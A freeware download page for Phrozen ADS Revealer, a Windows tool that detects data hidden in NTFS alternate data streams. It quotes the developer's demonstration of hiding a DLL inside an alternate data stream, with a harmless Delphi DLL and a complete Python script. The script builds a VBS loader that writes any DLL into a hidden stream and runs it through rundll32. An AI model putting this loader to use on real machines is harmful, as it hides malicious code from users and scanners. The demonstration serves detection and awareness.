Your download link is at the very bottom of the page... always.



Processed through Paypal
No account required.


Donate Bitcoin to this wallet:
1KkUMXvQ2ko3xcJkzitB7WYgoW6m79WFfm
Donate Ethereum to this wallet:
0x40E56922F43637224935CDC35e2c96E0392A8505
Donate Litecoin to this wallet:
LLYAFEyqjH69gkyCEpRjXNyedRCWrVChfL

Buy our over-priced crap to help keep things running.
Take No CrapwareOG Dad CapNo Password


Join our Facebook groupFollow us on TwitterFollow us on InstagramOur RSS FeedJoin us on TikTokJoin us on LinkedIn


 Home » OlderGeeks.com Freeware Downloads » Anti-Virus, Anti-Malware, Security Utilities » Advanced Malware Tools » Phrozen ADS (Alternate Data Stream) Revealer v1.0.5642   
File - Download Phrozen ADS (Alternate Data Stream) Revealer v1.0.5642
Description

Always scroll to the bottom of the page for the main download link.
We don't believe in fake/misleading download buttons and tricks. The link is always in the same place.


Phrozen ADS (Alternate Data Stream) Revealer v1.0.5642

Phrozen ADS (Alternate Data Stream) Revealer is a Microsoft Windows program, especially designed to reveal possible malicious ADS files in your file system. Since the Alternate Data Stream functionality is only available for NTFS (New Technology File System), the program is able to scan and detect this kind of files only for this type of file system (Physical Hard Drive/Virtual Hard Drive/Physical Removable Device/Virtual Removable Device).

If some ADS Files are detected during the scan you then can decide wether or not you want to keep them or to back them up. You can also have a content preview to detect in one glance if it looks legitemate or not. Phrozen ADS Revealer is the perfect tool to sanitize your NTFS file systems against bloated content or hidden malwares. Another great tool to put in your collection and 100% free.

What are Alternate Data Stream

Alternate data streams allow more than one data stream to be associated with a filename, using the format "filename:streamname" (e.g., "text.txt:extrastream"). NTFS Streams were introduced in Windows NT 3.1, to enable Services for Macintosh (SFM) to store resource forks. Although current versions of Windows Server no longer include SFM, third-party Apple Filing Protocol (AFP) products (such as GroupLogic's ExtremeZ-IP) still use this feature of the file system. Very small ADS (called Zone.Identifier) are added by Internet Explorer and recently by other browsers to mark files downloaded from external sites as possibly unsafe to run; the local shell would then require user confirmation before opening them.[21] When the user indicates that they no longer want this confirmation dialog, this ADS is deleted. Alternate streams are not listed in Windows Explorer, and their size is not included in the file's size. They are ignored when the file is copied or moved to another file system without ADS support, attached to an e-mail, or uploaded to a website. Thus, using alternate streams for critical data may cause problems. Microsoft provides a tool called Streams to view streams on a selected volume. Starting with Windows PowerShell 3.0, it is possible to manage ADS natively with seven cmdlets: Add-Content, Clear-Content, Get-Content, Get-Item, Out-String, Remove-Item, Set-Content. Malware has used alternate data streams to hide code. As a result, malware scanners and other special tools now check for alternate data streams.

The two potential dangers of Alternate Data Stream

Malware Vector: Using several techniques some types of malware could hide itself inside the ADS of legitimate files. You would never know about it and not all reputable antivirus programs are able to detect these on your file system. Also ADS can be used to store important information by malware and mask its activities (Storing malicious plugins files/Keylogger Logs/Webcam or Desktop capture, etc.). The infamous PoisonIvy RAT and DarkComet RAT used this technique to hide their plugins on the infected computer.
Overload Hard Drives memory: Alternate Data Stream files are not visible via Files Explorer, but physically exists in your Hard Drive. Some types of virus can fill the disk with so much junk that it can make the system almost unusable/unwritable. Using our Software you can easily now get rid of that sort of problems!

Playing with Alternate Data Stream
You can easily create Alternate Data Stream files using the Microsoft Windows Terminal program.
Create an ADS File with some text content

echo Hello World > c:\my_target.txt:myads.txt
Copy a file to ADS

type c:\file2copy.jpg > c:\my_target.txt:myads.jpg

Exploiting Alternate Data Stream
Description

If we read OWASP definition of Alternate Data Stream with an eye to security, we can see that they introduce the possibility to directly run application file from Alternate Data Stream using the following commands:

type C:\windows\system32
otepad.exe > c:\windows\system32\calc.exe:notepad.exe

start c:\windows\system32\calc.exe:notepad.exe

Unfortunately for Hackers but fortunately for your safety since the introduction of Windows 7 you cannot use this technique anymore to run application file directly from Alternate Data Stream.

However after few simple tests we found an easy but efficient way to get rid of this restriction by using the well known Rundll32.exe application from Microsoft used to run DLL code directly from command line.
Indeed Rundll32.exe doesn't apply this restriction to Alternate Data Stream so an Hacker could compile his Malware as a DLL file and directly run it hiddenly from ADS hosted by the signed and trusted process RunDll32.exe application.

Also to demonstrate this trick, we code a little snippet in Python which will encode a DLL file in a Visual Basic array of decimal value (Containing the binary code of the DLL) and generate the Visual Basic Script loader file used to extract this array to destination ADS location the malicious decoded DLL then use the Rundll32 process to execute our chosen exported function and voila.

The demonstration in Video



The DLL example code (Delphi)

-------------------------------------------------------------------------------------

library malicious;

uses Windows, Sysutils;

procedure onemethod(); stdcall;
var str : String;
begin
AllocConsole();
Writeln('Attached to path:' + GetModuleName(0));
Writeln('Attached to PID:' + IntToStr(GetCurrentProcessId));

Writeln(#13#10 + 'Press ENTER to leave!');
readln(str);
end;

exports onemethod;

begin

end.

---------------------------------------------------------------------------------

The VBS generator code (Python)

--------------------------------------------------------------------------------------

# PHROZEN SOFTWARE
# CODE EXAMPLE BY Jean-Pierre LESUEUR
# jplesueur [@] phrozensoft.com
# DESC: Generate a VBS (Visual Basic Script) file containing the possible
# malicious DLL file encoded in decimal to be written in a target file ADS
# Alternate Data Stream then run it using RunDLL32.exe.

import sys
import os.path

if len(sys.argv) != 6:
print("Missing arguments!
")
print("Usage:
")
print(r"1) The DLL file to be run from ADS (Needs to Exists)")
print(r"2) The destination VBS file (Will be created)")
print(r"3) The target file that will host the DLL file in ADS (Needs to Exists")
print(r"4) The desired ADS name of the DLL file (Choose whatever you wan't")
print(r"5) The DLL function to be call from the target DLL written to ADS")
exit()

FDLLSrc = str(sys.argv[1]) # THE DLL FILE TO BE RUN FROM ADS {NEEDS TO EXISTS}
FFileDest = str(sys.argv[2]) # THE DESTINATION VBS FILE {WILL BE CREATED}

FHostFile = str(sys.argv[3]) # THE TARGET FILE THAT WILL HOST THE DLL FILE {NEEDS TO EXISTS}
FPayloadDestName = str(sys.argv[4]) # THE ADS NAME OF THE DLL FILE {WHATEVER YOU WANT}
FDLLExportedFuncName = str(sys.argv[5]) # THE DLL FUNCTION TO BE EXECUTED FROM ADS {MUST BE PRESENT IN DLL EXPORT}

if not os.path.exists(FDLLSrc):
print("The input DLL file must exists!")
exit()

if not os.path.exists(FHostFile):
print("The host file to run input DLL from ADS must exists!")
exit()

payload = "payload=array(";
with open(FDLLSrc, 'rb') as FDLL:
while True:
s = FDLL.read(1)
if len(s) == 0: break
b = ord(s)
payload += str(b) + ","
payload = payload[:-1]
payload += ")"
FDLL.close

# WRITE THE VBS FILE
with open(FFileDest, 'w') as FDest:
FDest.write(payload + "
")

FDest.write("Set FSO = Wscript.CreateObject(\"Scripting.FileSystemObject\")
")
FDest.write("Set CTF = FSO.CreateTextFile(\"" + FHostFile + ":" + FPayloadDestName + "\")
")
FDest.write("for i = 0 to UBound(payload)
")
FDest.write("buff = buff&chr(payload(i))
")
FDest.write("next
")
FDest.write("CTF.Write buff
")
FDest.write("Dim objShell
")
FDest.write("Set objShell = WScript.CreateObject(\"WScript.Shell\")
")
FDest.write("objShell.Run(\"rundll32 \"\"" + FHostFile + ":" + FPayloadDestName + "\"\" " + FDLLExportedFuncName + "\")")


#EOF

----------------------------------------------------------------------


Sha1 : 59398e36a1ef09ae8b78fa8f2dee255eb04d78ce
Sha256 : d4db18ee6da2616aaadbba679d79701efde1f9056a98a088524baae56e0f60e1























Click here to visit the author's website.
Continue below for the main download link.


Downloads Views Developer Last Update Version Size Type Rank
6,069 12,863 PHROZEN SAS <img src="https://www.oldergeeks.com/downloads/gallery/thumbs/adsrevealer1_th.png"border="0"> Nov 15, 2019 - 12:00 1.0.5642 2.42MB ZIP 5/5, out of 67 Votes.
File Tags
Phrozen  ADS  (Alternate  Data  Stream)  Revealer  v1.0.5642  
      
Ope! Hold on, Speedy.
You gotta read this before you download below:

There are no ads, no fake download buttons and no crapware here.
This website has lived for 16 years solely through donations.
You can download without donating but we use the "Honor System"
here in the Ozarks. If your momma raised you to be honorable,
make your donation to keep things running.
Your momma would be so proud!

Thank you! -Randy & Deanna (The Older Geeks)
Missouri Ozarks, USA

Monthly operating costs = $750
Donations cover operating costs first
then are set aside for future upgrades and/or
handed-over to Deanna for new shoes.

PayPal or Credit/Debit
IMPORTANT: This donation will show up as Home Computer Repair on your bank statement.
Or

Or

Or
Send a check payable to Home Computer Repair LLC, 208 E. Water St. Mount Vernon, MO 65712

Recent Super Donors ($50+)
Thanks, Robert
Thanks, Ira
Thanks, James
Thanks, R.

Recent Donors
Thanks, Michael
Thanks, Paul
Thanks, Kurt
Thanks, Keith
Thanks, Chris
Thanks, Michael
Thanks, Terry
Thanks, Conleys Horse Photos
Thanks, Tim
Thanks, Raymond

→ Download Your File ←


Click to Rate File     Share it on Twitter →


OlderGeeks.com Copyright (c) 2024